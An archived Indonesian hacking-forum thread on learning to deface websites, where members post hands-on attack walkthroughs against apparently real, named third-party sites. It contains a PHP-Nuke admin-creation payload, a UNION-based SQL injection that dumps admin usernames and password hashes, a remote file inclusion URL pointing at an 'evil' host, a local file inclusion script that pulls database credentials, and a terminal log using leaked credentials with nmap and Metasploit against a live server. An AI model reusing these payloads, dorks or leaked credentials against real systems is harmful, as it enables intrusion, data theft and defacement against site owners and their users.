Belajar Deface situs [Archive]

Savoxit

04-22-2010, 04:24 PM

Bwat para senior semuanya .....hamba mohon bimbingannya seputar defacing situs web.:D
mulai dasar kalu bisa....(Newbie)

Koza

04-23-2010, 08:39 PM

hups....... hacker content nich , bang momod......... where are you, boleh g hacker content

anvie

04-24-2010, 05:08 AM

gpp boleh aja kok

andretans

04-25-2010, 03:34 AM

hehehe... jadi inget masa lalu nih... beneran ga pa2 ya posting artikel kayak gini..?(makasih mas anvie atas ijinnya). oke, ni ada trik jadul untuk hack situs berbasis php nuke. tentunya bug ini sudah diketahui dan sudah dipatch di versi terbaru mereka. jadi ga pa2lah kl untuk belajar. inget! cm untuk belajar, silakan gunakan website milik sendiri untuk latihan.
alamat standar untuk website dengan php nuke adalah misal w*w.korban.com/nuke/index.php . untuk memulainya kita coba ganti index.php menjadi admin.php sehingga menjadi w*w.korban.com/nuke/admin.php .
Sekarang coba masukan bug ini dibelakang situs tadi :
?op=AddAuthor&add_aid=wongndeso&add_name=God&add_pwd=katrok&add_email=wongndeso@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
Jika target ternyata masi memiliki bug itu maka situs itu akan berubah alamat menjadi w*w.korban.com/nuke/admin.php/op=mod_author
coba isi login : wongndeso dan pass : katrok
Jika semuanya lancar maka akan tampil halaman administration menu, dan itu artinya situs sudah dikuasai. Untuk mendefacenya coba tampilkan pesan atau gambar melalui menu messages.
lihat hasilnya di w*w.korban.com/nuke/index.php

*Bug ini terdapat di file auth.php line 48, dimana kita bisa memanipulasi cookie dan radminsuper menjadi 1. sedang untuk penambahan id login dan pass dapat ditemukan variable nya di authors.php

void

04-25-2010, 04:03 PM

posting ini hanya untuk tujuan pembelajaran. sebagai catatan, saya sudah lama kontak admin situs korban pada contoh ini, tapi tidak ada respon :( btw, ini bukan defacing, hanya pelajaran dasar SQL injection untuk mendapatkan informasi :)

cari situs yang kemungkinan ada celahnya, pada contoh ini celah berupa SQLinjection (SQLi)
http://www.korban.com/catalog_det.php?id=121
kita coba menguji apakah situsnya vulnerable
http://www.korban.com/catalog_det.php?id=121+order+by+20--
muncul error, lengkap dengan query yang menimbulkan error ;)
Error in Query! SELECT left(kode,4) as prekode,barang,bahan,warna,ukuran,berat,harga,disk on,hargasat,deskr,stok_terbatas,Namafile,id FROM tb_barang WHERE id=121 order by 20-- and publish=1
dari error di atas, bisa dilihat bahwa querynya membutuhkan 13 kolom
http://www.korban.com/catalog_det.php?id=121+order+by+13--
sekarang, kita gunakan query union select untuk mendapatkan magic number, perhatikan bahwa angka id yang kita gunakan adalah minus (-121) biar magic numbernya muncul.
http://www.korban.com/catalog_det.php?id=-121+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12--
hasil dari query di atas adalah
9
Nama Barang : 1
Bahan : 2
Warna : 3
Ukuran :
Berat : 5 gr.
Harga Normal : Rp. 6,- / 8
Harga Spesial : Rp. -1,- / 8

dari hasil di atas, kita akan menggunakan "9" sebagai magic number untuk menampilkan query yang kita inginkan. langkah berikut adalah untuk mengganti magic number "9" menjadi informasi mengenai target (database user, nama database dan versinya)
http://www.korban.com/catalog_det.php?id=-121+union+select+0,1,2,3,4,5,6,7,8,concat(user(),0 x3a,database(),0x3a,version()),10,11,12--
hasil dari query di atas
boutique_pru@localhost:boutique_prudb:5.0.90-community
Nama Barang : 1
Bahan : 2
Warna : 3
Ukuran :
Berat : 5 gr.
Harga Normal : Rp. 6,- / 8
Harga Spesial : Rp. -1,- / 8
nah, sekarang kita tahu kalau versi databasenya adalah versi 5.0.90 berarti kita bisa menggunakan query group_concat. selanjutnya, kita mencari table yang ada pada database boutique_prudb
http://www.korban.com/catalog_det.php?id=-121+union+select+0,1,2,3,4,5,6,7,8,group_concat(ta ble_name),10,11,12+from+information_schema.tables+ where+table_schema=database()--
hasilnya adalah nama tabel pada database boutique_prudb
tb_barang
tb_kodearea
tb_kota
tb_kurir
tb_kurir_pos_old
tb_kurir_tikijne
tb_libur
tb_newsletter
tb_newsletter_blast
tb_order
tb_order_status
tb_reminder
tb_stok
tb_transaction
tb_user
tb_userlogin
langkah berikutnya adalah mencari nama kolom pada tabel tb_userlogin. sebagai catatan, nama tabelnya kita encode menggunakan hexadesimal agar querynya bisa dieksekusi.
http://www.korban.com/catalog_det.php?id=-121+union+select+0,1,2,3,4,5,6,7,8,group_concat(co lumn_name),10,11,12+from+information_schema.column s+where+table_name=0x74625f757365726c6f67696e--
hasilnya adalah sebagai berikut:

id
txtuser
txtpassw
txtname
menu
IsAdmin
terakhir, kita cari isi dari tabel tb_userlogin dengan menggunakan informasi kolom pada langkah sebelumnya
http://www.korban.com/catalog_det.php?id=-121+union+select+0,1,2,3,4,5,6,7,8,group_concat(id ,0x3a,txtuser,0x3a,txtpassw,0x3a,txtname,0x3a,IsAd min),10,11,12+from+tb_userlogin--
hasilnya adalah:

1:superadmin:85mZCQf55XTqs:Admin:1
39:ami:eac5zJPSFtwyQ:Lasmiyati:1
40:adminspk:5fpJJfAcBuNxY:Admin SPK:1
47:sutra:a8xrHImKiwomk:Sutra Dewi:1
51:yuliani:65nbTN2IoEUvk:Eka Moriana Yuliani:1
52:eka:17CA0BRwNGkOg:Eka Moriana:1
53:neny:e0Q4TJ2tpw5TI:Neny Setyarini:1

selanjutnya silakan dikembangkan sendiri :)

oh iya, ini cara manual. kalau yang saya perhatikan, biasanya banyak yang lebih suka pakai tools/script seperti "darkmysqli", "schemafuzz" dan sejenisnya.

anvie

04-26-2010, 04:18 AM

untuk para ansaver, kalau mau tanya-tanya tentang hacking, nih atas gw jagonya, jangan malu-malu tanya ma dia ;)

@void: nice tutorial bro :top:

Koza

04-26-2010, 09:34 AM

emang sih, udah berubah alamtanya, tapi kok gak ada form login ya

void

04-26-2010, 11:13 AM

untuk para ansaver, kalau mau tanya-tanya tentang hacking, nih atas gw jagonya, jangan malu-malu tanya ma dia ;)

@void: nice tutorial bro :top:

thank you bro :) ... btw, saya juga baru belajar, heuheue. makanya tutorialnya masih pemula bgt :shy:

emang sih, udah berubah alamtanya, tapi kok gak ada form login ya

sebenarnya contoh di atas itu hanya untuk mengambil data aja bro, bukan untuk deface :) soalnya saya ga bisa deface, hanya tertarik dengan database :)

Savoxit

04-27-2010, 12:53 PM

bisa ga' deface dengan cara masukin html code lewat fasilitas-fasilitas situs kayak "shootbox, commentbox, dll"???

M2R

04-28-2010, 06:52 PM

@atas
insyaAllah bs :D

@all
pengen tw apa yg jd korban om void (atau mas? :-") ?

google dork :

inurl:catalog_det.php?id=

:D

www.pru*****que.com

Savoxit

05-04-2010, 08:49 AM

@atas
berarti, bisa deface search engine juga donk?
(ansav.com kudu hati-hati nih....)

widnyana putra

05-04-2010, 02:17 PM

bukan deface search engine, tapi NYARI VICTIM lewat search engine.

Kayaknya perlu bahas macam-macam bug nih...

saya coba jelasin RFI [kalo salah mohon di koreksi ya]

RFI atau Remote File Inclusion adalah bug pada suatu script yang mengizinkan penyerang untuk meng-include-kan file dari luar site

seperti
http://site/bug.php?path=http://evil/exploit?
Sehingga penyerang bisa dengan leluasa melihat-lihat isi webhost tanpa harus masuk ke Hosting panel korban. dan memungkinkan untuk menghapus [rm -fr *.* :D] semua file yang ad. bergantung dari seberapa fatal bug yg bisa di exploitasi :)

http://webspace.forumcommunity.net/?t=28066540

monggo dilanjut :o_o:

void

05-05-2010, 05:36 AM

@widnyana: wah, mantap bro :) ... btw, saya habis lihat script di url yg bro kasih. keknya bisa dioprek lagi script perlnya jadi pakai array (CMIIW) ;)

oh iya, ini ada oleh2... jgn lupa di cek dulu siapa tahu ada bd di scriptnya.

http://someshit.nm.ru/br/

widnyana putra

05-05-2010, 09:37 AM

ia,kayaknya kalo pake array bsa lbh cpet, trus itu list bugnya juga udah rada kadaluarsa.
kebanyakan script yg ada private use. jadi ya menghormati yg bikin, ga bsa di publish.

hayoo siapa mw ngjelasin tentang LFI. ?

oh iya, ini ada oleh2... jgn lupa di cek dulu siapa tahu ada bd di scriptnya.

http://someshit.nm.ru/br/

ajiiibbb..... wkwkwkwk...... ada rootkitnya. :D

widnyana putra

05-05-2010, 03:10 PM

ini tadi iseng main RFI, pas nemu 1 site yg lumayan ga keurus,jadinya berani make itu site buat iseng. **om admin, maaf ya... **

Vulnnya ada di http://www.grc-powerfactory.gr/index.php?func=http://site/to/evilscript?

http://file.widnyana.uni.cc/p/dsfgd.jpg

http://www.grc-powerfactory.gr/index.php (http://anonym.to/?http://www.grc-powerfactory.gr/index.php)

void

05-05-2010, 04:16 PM

wah, bro widnyana langsung beraksi :worship: ... sekarang saya coba jelasin soal LFI berikut contohnya :)

LFI (Local File Inclusion) adalah celah, dimana seseorang bisa mengakses file-file yang ada di server dengan menggunakan URL tertentu. berikut ini contohnya (real life example)

Disclaimer: posting ini hanya untuk tujuan pembelajaran semata. use at your own risk :)

situs yang vulnerable bisa saja ada dimana2. berikut ini contohnya
http://www.s*spik.com/

kalau situs itu dibuka menggunakan browser biasa, semuanya tampak normal :p tapi berhubung saya tidak punya cukup bandwidth, jadi saya buka pakai text browser. tampilannya seperti ini:

http://i41.tinypic.com/2vum39d.png

selanjutnya bisa terlihat di bagian gambarnya ada URL menarik (coba perhatikan foto_01.jpg)
http://www.s*spik.com/new_web/componentImage.php?com=photoFlash&d=1&f=foto_01.jpg

sekarang coba kita ganti dengan nama file yg kemungkinan bisa diakses
http://www.s*spik.com/new_web/componentImage.php?com=photoFlash&d=1&f=index.php

 
Warning: filesize() [<a href='function.filesize'>function.filesize</a>]: stat failed for components/photoFlash/images/1/index.php in /home/sispik/public_html/new_web/componentImage.php on line 11 
 
Warning: Cannot modify header information - headers already sent by (output started at /home/sispik/public_html/new_web/componentImage.php:11) in /home/sispik/public_html/new_web/componentImage.php on line 11 
 
Warning: file_get_contents(components/photoFlash/images/1/index.php) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in /home/sispik/public_html/new_web/componentImage.php on line 13 

dari hasil di atas, kita bisa tahu path dari file yang ingin kita akses
/home/sispik/public_html/new_web/components/photoFlash/images/1/index.php

selanjutnya kita akan menggunakan informasi tersebut untuk mendapatkan file yang kita inginkan, misalnya
http://www.s*spik.com/new_web/componentImage.php?com=photoFlash&d=1&f=../../../../index.php

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<?php
include_once 'component.php';
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>SISPIK : Singapore School, Pantai Indah Kapuk</title>
<LINK REL="SHORTCUT ICON" HREF="favicon.ico">
<link type="text/css" href="theme/default/main.css" rel="stylesheet" />
<script type="text/javascript" src="FrameWork/js/AjaxCommon.js"></script>
<script type="text/javascript" src="pageJavaScript.php?url=downloads"></script>
<script type="text/javascript" src="pageJavaScript.php?url=generalInfo"></script>
<script type="text/javascript" src="pageJavaScript.php?url=links"></script>
</head>
<body onload='
timer = setInterval("init_buffer_image()",5000);
'>
<table style="height:100%; width:100%; vertical-align:middle;">
<tr>
<td>
<center>
<table cellpadding="0" cellspacing="0" class="tableFrame">
<tr>
<td class="tdFrame">
<table cellpadding="0" border="0" cellspacing="0" class="tableContent">
<col width="174px">
<col width="606px">
<tr style="height:407px;">
<td class="tdContent" style="width:174px;">
<div id="topLeftContainer">
<script language="javascript">
ajax.SendingRequestToDiv('page.php?url=topLeft','t opLeftContainer',defaultAjaxHandlerToDiv);
</script>
</div>
</td>
<td class="tdContent">
<?php loadComponent("photoFlash",null); ?>
</td>
</tr>
<tr>
<td height="173px" colspan="2" class="tdMenuPanel" style="display:table-cell;">
<?php loadComponent("tabPage", array(173,775,175)); ?>
</td>
</tr>
</table>
</td>
</tr>
</table>
</center>
</td>
</tr>
</table>
</body>
</html>

berhasil ;) sekarang kita cukup membuat script sederhana untuk mempermudah pekerjaan
#!/bin/env python
import sys, urllib2

def main():
while True:
f = raw_input("file: ")
if (f.lower() == "quit") or (f.lower() == "exit"): break
d = urllib2.urlopen("http://www.s*spik.com/new_web/componentImage.php?com=photoFlash&d=1&f=../../../../" + f)
print d.read() + "\n"

if __name__=="__main__":
main()

contoh session lognya
$ ./lfish.py
file: component.php
<?php
function loadComponent($com, $comParam) {
include_once 'components/'.$com.'/main.php';
}
?>

file: components/tabPage/main.php
<?php
include_once 'FrameWork/MySQLUtil.php';

class TabPanel{
public $id;
public $text;
public $tabWidth;
public $url;
public $container;
public $javaScript;

function TabPanel($id, $text, $width, $url, $container, $javaScript){
$this->id=$id;
$this->text=$text;
$this->tabWidth=$width;
$this->url=$url;
$this->container=$container;
$this->javaScript=$javaScript;
}
}

class TabControl{
public $panelHeight;
public $panelWidth;
public $tabLeftPos;
public $panelList = array();
private $con;
private $rs;
private $query = "SELECT * FROM com_tabpage_menu";

function TabControl($hi, $wi, $p){
$this->panelHeight = $hi;
$this->panelWidth = $wi;
$this->tabLeftPos = $p;

$this->con = new MySQLConnection();
$this->rs = new RecordSet();
$this->rs = $this->con->execute($this->query);
$this->rs->setCursorBeforeFirst();
$i = 0;
while($row = $this->rs->getNextRow()){
$this->panelList[$i] = new TabPanel(
$row["id"],$row["label"],$row["width"],$row["url"],$row["targetLayer"],$row["jsUrl"]
);

$i++;
}
}
}

if(isset($_GET['hi']) && $_GET['wi'] && $_GET['p']){
$tabControl = new TabControl($_GET['hi'],$_GET['wi'],$_GET['p']);
}else{
$tabControl = new TabControl($comParam[0],$comParam[1],$comParam[2]);
}
?>

<script language="javascript">
var tabCount = <?php echo count($tabControl->panelList)?>;
<?php
$i=0;
$idTab = "";
$divTab = "";
$divTag = "";
$divURL = "";
$divLoaded = "";
$divJS = "";
foreach ($tabControl->panelList as $panel){
$idTab .= '"'.$panel->id.'"';
$divTab .= '"'.$panel->container.'"';
$divURL .= '"'.$panel->url.'"';
$divLoaded .= 'false';
$divJS .= '"'.$panel->javaScript.'"';
$divTag .= '<div style="width:100%; height:100%; display:'.(($i > 0)?"none":"inline").'" id="'.$panel->container.'">Loading . . . .['.$panel->text.']</div>';
$i++;
if($i < count($tabControl->panelList)){
$idTab .= ",";
$divTab .= ",";
$divURL .= ",";
$divLoaded .= ",";
$divJS .= ",";
}
}
?>
var idTab = [<?php echo $idTab; ?>];
var divTab = [<?php echo $divTab; ?>];
var divURL = [<?php echo $divURL; ?>];
var divLoaded = [<?php echo $divLoaded; ?>];
var divJS = [<?php echo $divJS; ?>];
</script>
<script src="componentJavaScript.php?com=tabPage" type="text/javascript"></script>
<script src="FrameWork/js/AjaxCommon.js" type="text/javascript"></script>
<div style="display:none;">
<img src = "componentImage.php?com=tabPage&d=hover&f=left.jpg"/>
<img src = "componentImage.php?com=tabPage&d=hover&f=bg.jpg"/>
<img src = "componentImage.php?com=tabPage&d=hover&f=right.jpg"/>
</div>

<table cellpadding="0" cellspacing="0" border="0" style="table-layout:fixed; font-size:12px; boder-style:solid;">
<colgroup>
<?php
echo '<col width="'.$tabControl->tabLeftPos.'px"/>';
$lebar = $tabControl->tabLeftPos;
foreach ($tabControl->panelList as $panel){
echo '<col width="6px"/>';
echo '<col width="'.$panel->tabWidth.'px"/>';
echo '<col width="7px"/>';
$lebar += $panel->tabWidth + 13;
}
echo '<col width="'.($tabControl->panelWidth - $lebar).'px"/>';
?>
</colgroup>
<tr style="height:4px;">
<td rowspan="2" style="border-bottom:solid black 1px; background-image: url(componentImage.php?com=tabPage&f=tab-bg.jpg);
background-repeat: repeat-x;"> </td>
<td colspan="<?php echo 3*count($tabControl->panelList) ?>" style="background-image: url(componentImage.php?com=tabPage&f=tab-bg.jpg);
background-repeat: repeat-x;"></td>
<td rowspan="2" style="border-bottom:solid black 1px;background-image: url(componentImage.php?com=tabPage&f=tab-bg.jpg);
background-repeat: repeat-x;"> </td>
</tr>
<tr style="vertical-align:bottom; height:19px;">

<?php
$first = true;
foreach ($tabControl->panelList as $panel){
$path = (!$first)?"non.active":"active";
$border = (!$first)?"solid black 1px;":"solid #FFF9F0 1px;";
$color = (!$first)?"#757575":"black";
?>
<td style="border-bottom:<?php echo $border ?>" id="td<?php echo $panel->id ?>01">
<img src="componentImage.php?com=tabPage&d=<?php echo $path ?>&f=left.jpg" id="tab<?php echo $panel->id ?>01"/>
</td>
<td valign="bottom"
style="text-indent:2px; text-align:center;
color:<?php echo $color ?>;
background-image: url(componentImage.php?com=tabPage&d=<?php echo $path ?>&f=bg.jpg);
background-repeat: repeat-x;
background-position: left bottom;
cursor:pointer;
border-bottom:<?php echo $border ?>"
id="tab<?php echo $panel->id ?>02"
onmouseover="tab_hover('<?php echo $panel->id ?>');"
onmouseout="tab_out('<?php echo $panel->id ?>');"
onclick="set_active('<?php echo $panel->id ?>');"
>
<?php echo $panel->text; ?>
</td>
<td style="border-bottom:<?php echo $border ?>;" id="td<?php echo $panel->id ?>03">
<img src="componentImage.php?com=tabPage&d=<?php echo $path ?>&f=right.jpg" id="tab<?php echo $panel->id ?>03"/>
</td>
<?php
$lebar += $panel->tabWidth;
$first = false;
}
?>
</tr>
<tr style="height:<?php echo $tabControl->panelHeight - 23 ?>px;">
<td colspan="<?php echo 3*count($tabControl->panelList) + 2 ?>" style="">
<?php echo $divTag; ?>
</td>
</tr>
</table>
<script>
loadTabPanel(0);
</script>

file: FrameWork/MySQLUtil.php
<?php

class RecordSet {
private $result;
private $rowIndex = 0;

public function fill($rs){
$this->result = $rs;
}

public function getFirstRow(){
$this->rowIndex = 0;
if($this->getRowsNumber() > 0){
mysql_data_seek($this->result, $this->rowIndex);
return $this->getArray();
}

return false;
}

public function getLastRow(){
if($this->getRowsNumber() > 0){
$this->rowIndex = $this->getRowsNumber();
mysql_data_seek($this->result, $this->rowIndex);
return $this->getArray();
}

return false;
}

public function getNextRow(){
if($this->getRowsNumber() > ($this->rowIndex + 1)){
$this->rowIndex++;
mysql_data_seek($this->result, $this->rowIndex);
return $this->getArray();
}

return false;
}

public function getPrevRow(){
if($this->getRowsNumber() > ($this->rowIndex - 1)
&& $this->rowIndex > 0){
$this->rowIndex--;
mysql_data_seek($this->result, $this->rowIndex);
return $this->getArray();
}

return false;
}

public function setCursorBeforeFirst(){
$this->rowIndex = -1;
}

public function getArray(){
return mysql_fetch_array($this->result, MYSQL_ASSOC);
}

public function getResult(){
return $this->result;
}

public function getRowsNumber(){
return mysql_num_rows($this->result);
}
}

class MySQLConnection {
private $USER_ID = "sispik_ruut";
private $PASSWORD = "ruut123";
private $HOST = "localhost:3306";
private $DATABASE = "sispik_web";

private $link;
public function open(){
$this->link = mysql_connect($this->HOST, $this->USER_ID, $this->PASSWORD);
mysql_select_db($this->DATABASE, $this->link);
}

public function close(){
mysql_close($this->link);
}

public function execute($query){
$this->open();
$result = mysql_query($query, $this->link);
$this->close($this->link);

$rs = new RecordSet;
$rs->fill($result);
return $rs;
}

public function getUser_id() {
return $this->USER_ID;
}

public function setUser_id($USER_ID) {
$this->USER_ID = $USER_ID;
}

public function getPassword() {
return $this->PASSWORD;
}

public function setPassword($PASSWORD) {
$this->PASSWORD = $PASSWORD;
}

public function getHost() {
return $this->HOST;
}

public function setHost($HOST) {
$this->HOST = $HOST;
}

public function getDatabase() {
return $this->DATABASE;
}

public function setDatabase($DATABASE) {
$this->DATABASE = $DATABASE;
}
}
?>

file: exit
$

hmmm... menarik ;)
private $USER_ID = "sispik_ruut";
private $PASSWORD = "ruut123";
private $HOST = "localhost:3306";
private $DATABASE = "sispik_web";

btw, sedikit trivia, sebenarnya untuk mengunduh file dari halaman "download" situs tersebut, tidak perlu memasukkan password. cukup ke URL ini
http://www.s*spik.com/new_web/pages/downloads/files/

widnyana putra

05-05-2010, 05:18 PM

beuh. . om void kejam. :D sampe username+pasword ketemu. tinggal di dump aja tuh . :D

oya, om void pake distro apa?

void

05-05-2010, 05:41 PM

beuh. . om void kejam. :D sampe username+pasword ketemu. tinggal di dump aja tuh . :D

oya, om void pake distro apa?

saya pakai backtrack 2 yang dimodifikasi lagi. intinya sih slackware, udah tradisi soalnya pakai slackware... huehuehue :)

Savoxit

05-08-2010, 12:18 PM

Terusin ohm "Void" n' ohm "Widnyana"....:)

void

06-17-2010, 08:14 PM

sebenernya ini dari kemarin pengen post, tapi blm sempat. jadi intinya, dari LFI (Local File Inclusion) kita bisa sampai pada database target. maaf, lognya kacau soalnya langsung di-dump dari terminal. penjelasan langkah2nya pakai tanda ini -> "#####"

$ ##### target -> http://www.leno2u.com/leno2/file_download.asp?file=
$ ##### vuln nya adalah LFI, mari kita cek sama-sama
$
$ curl -s "http://www.leno2u.com/leno2/file_download.asp?file=./home.asp" | head -10

<%
'GET STATES
sql = "SELECT state_id, state_name FROM TBL_STATE"
set rs = cnn.execute(sql)
rsStArrLen = -1
If Not (rs.EOF and rs.BOF) Then
rsStArr = rs.GetRows
rsStArrLen = UBound(rsStArr, 2)
End If
$
$ ##### nah, itu dia file yang akan kita cek (header00.asp)
$
$ curl -s "http://www.leno2u.com/leno2/file_download.asp?file=./include/header00.asp" | head -10



<%
If LBDBConnect(cnn) Then

'GET ABOUT US CAT LEVEL 2 & CONTENT
sql = "SELECT content_id, title, 'CON' AS TYPE FROM TBL_CONTENT WHERE cat_id = " & CAT_AU & " AND status = 'A' "
sql = sql & "UNION "
sql = sql & "SELECT cat_id AS content_id, cat_name AS title, 'CAT' AS TYPE FROM TBL_CAT WHERE parent_id = " & CAT_AU & " AND status = 'A' AND cat_level = 2 "
$
$ ##### coba perhatikan file include "LBDBConnect.asp"
$ ##### kemungkinan besar file ini adalah file konfigurasi koneksi ke database ;)
$ ##### let's check it out
$
$ curl -s "http://www.leno2u.com/leno2/file_download.asp?file=./lib/LBDBConnect.asp"


<%
'************************************************* ***************************
'Program ID : LBDBConnect.asp
'Description : Connect to / Disconnect from the Database
'Usage : Eg: Call LBDBConnect(IN_db)
'Include Files : Eg: /lib/LBDBConnect.asp
'************************************************* ***************************
%>

<%
'CONN_STRING = "Provider=sqloledb;Data Source=.\SQLEXPRESS;Database=leno2;UID=leno2;Pwd=l eno2login"

CONN_STRING = "Provider=sqloledb;Data Source=202.190.167.124,1434;Network Library=DBMSSOCN;Initial Catalog=leno2;User ID=leno2;Password=leno2login;"

FUNCTION LBDBConnect(IN_db)
Set IN_db = Server.CreateObject("ADODB.Connection")
IN_db.Open CONN_STRING

If Err Then
' Response.Write IN_db.Errors.Item(1) & " " & Err.number
LBDBConnect = false
Call LBDBDisconnect(IN_db)
Else
LBDBConnect = true
End If
END FUNCTION

FUNCTION LBDBDisconnect(IN_db)
IN_db.Close
END FUNCTION
%>$
$
$ ##### wah, ada connection string nya :D perlu dicatat IP dan portnya
$ ##### IP : 202.190.167.124
$ ##### Port: 1434
$ ##### databasenya pakai MS-SQL. ok mari kita scan IP itu
$
$ sudo -s
# nmap -sS -sV -PN -F -T4 -Dwww.twitter.com 202.190.167.124

Starting Nmap 5.21 ( http://nmap.org ) at 2010-06-17 16:57 WIT
Nmap scan report for 202.190.167.124
Host is up (0.33s latency).
Not shown: 85 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp filtered smtp
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS webserver 6.0
88/tcp open http Microsoft IIS webserver 6.0
135/tcp filtered msrpc
139/tcp open netbios-ssn
443/tcp open https?
445/tcp filtered microsoft-ds
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2000 8.00.2039; SP4
3389/tcp open microsoft-rdp Microsoft Terminal Service
6000/tcp filtered X11
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.45 seconds
#
# ##### nah, sekarang waktunya kita bereksperimen dengan metasploit :)
#
# ./msfconsole

o 8 o o
8 8 8
ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P
8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8
8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8
8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8
..:..:..:.....:::..::.....::.....:8.....:..:.....: :..::..:
::::::::::::::::::::::::::::::::::8::::::::::::::: ::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::

=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 302 exploits - 66 auxiliary
+ -- --=[ 140 payloads - 18 encoders - 6 nops
=[ svn r9547 updated today (2010.06.16)

msf > search mssql

Searching loaded modules for pattern 'mssql'...

Auxiliary
=========

Name Rank Description
---- ---- -----------
admin/mssql/mssql_enum normal Microsoft SQL Server Configuration Enumerator
admin/mssql/mssql_exec normal Microsoft SQL Server xp_cmdshell Command Execution
admin/mssql/mssql_sql normal Microsoft SQL Server Generic Query
scanner/mssql/mssql_login normal MSSQL Login Utility
scanner/mssql/mssql_ping normal MSSQL Ping Utility

Exploits
========

Name Rank Description
---- ---- -----------
windows/mssql/lyris_listmanager_weak_pass excellent Lyris ListManager MSDE Weak sa Password
windows/mssql/ms02_039_slammer good Microsoft SQL Server Resolution Overflow
windows/mssql/ms02_056_hello good Microsoft SQL Server Hello Overflow
windows/mssql/ms09_004_sp_replwritetovarbin good Microsoft SQL Server sp_replwritetovarbin Memory Corruption
windows/mssql/mssql_payload excellent Microsoft SQL Server Payload Execution

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 9528
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
MC <mc@metasploit.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME sa no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

Description:
This module simply queries the MSSQL instance for a specific
user/pass (default is sa with blank).

msf auxiliary(mssql_login) > set RHOSTS 202.190.167.124
RHOSTS => 202.190.167.124
msf auxiliary(mssql_login) > set RPORT 1434
RPORT => 1434
msf auxiliary(mssql_login) > set USERNAME leno2
USERNAME => leno2
msf auxiliary(mssql_login) > set PASSWORD leno2login
PASSWORD => leno2login
msf auxiliary(mssql_login) > run

202.190.167.124:1434 - MSSQL - Starting authentication scanner.

202.190.167.124:1434 - MSSQL - Trying username:'leno2' with password:''

[-] 202.190.167.124:1434 failed to login as 'leno2'

202.190.167.124:1434 - MSSQL - Trying username:'leno2' with password:'leno2login'

[+] 202.190.167.124:1434 - MSSQL - successful login 'leno2' : 'leno2login'

Scanned 1 of 1 hosts (100% complete)

Auxiliary module execution completed
msf auxiliary(mssql_login) > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > info

Name: Microsoft SQL Server Configuration Enumerator
Version: 9179
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
Carlos Perez <carlos_perez@darkoperator.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as

Description:
This module will perform a series of configuration audits and
security checks against a Microsoft SQL Server database. For this
module to work, valid administrative user credentials must be
supplied.

msf auxiliary(mssql_enum) > set RHOST 202.190.167.124
RHOST => 202.190.167.124
msf auxiliary(mssql_enum) > set RPORT 1434
RPORT => 1434
msf auxiliary(mssql_enum) > set USERNAME leno2
USERNAME => leno2
msf auxiliary(mssql_enum) > set PASSWORD leno2login
PASSWORD => leno2login
msf auxiliary(mssql_enum) > run

Running MS SQL Server Enumeration...

Version:

Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)

Feb 9 2007 22:47:07

Copyright (c) 1988-2005 Microsoft Corporation

Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Configuration Parameters:

C2 Audit Mode is Not Enabled

xp_cmdshell is Not Enabled

remote access is Enabled

allow updates is Not Enabled

Database Mail XPs is Not Enabled

Ole Automation Procedures are Not Enabled

Databases on the server:

Database name:master

Database Files for master:

c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf

c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf

Database name:tempdb

Database Files for tempdb:

c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\tempdb.mdf

c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\templog.ldf

Database name:model

Database Files for model:

[-] Auxiliary failed: NoMethodError undefined method `each' for nil:NilClass

[-] Call stack:

[-] (eval):242:in `run'

[-] (eval):238:in `each'

[-] (eval):238:in `run'

Auxiliary module execution completed
msf auxiliary(mssql_enum) > use auxiliary/admin/mssql/mssql_sql
msf auxiliary(mssql_sql) > info

Name: Microsoft SQL Server Generic Query
Version: 9179
License: Metasploit Framework License (BSD)
Rank: Normal

Provided by:
tebo <tebo@attackresearch.com>

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
SQL select @@version no The SQL query to execute
USERNAME sa no The username to authenticate as

Description:
This module will allow for simple SQL statements to be executed
against a MSSQL/MSDE instance given the appropiate credentials.

References:
www.attackresearch.com
